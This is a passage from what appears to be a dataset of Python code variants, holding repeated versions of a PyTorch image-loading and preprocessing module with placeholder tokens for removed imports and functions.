self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\n<function token>\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\n<function token>\n<function token>\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\n<function token>\n<function token>\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\n<function token>\n<function token>\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: 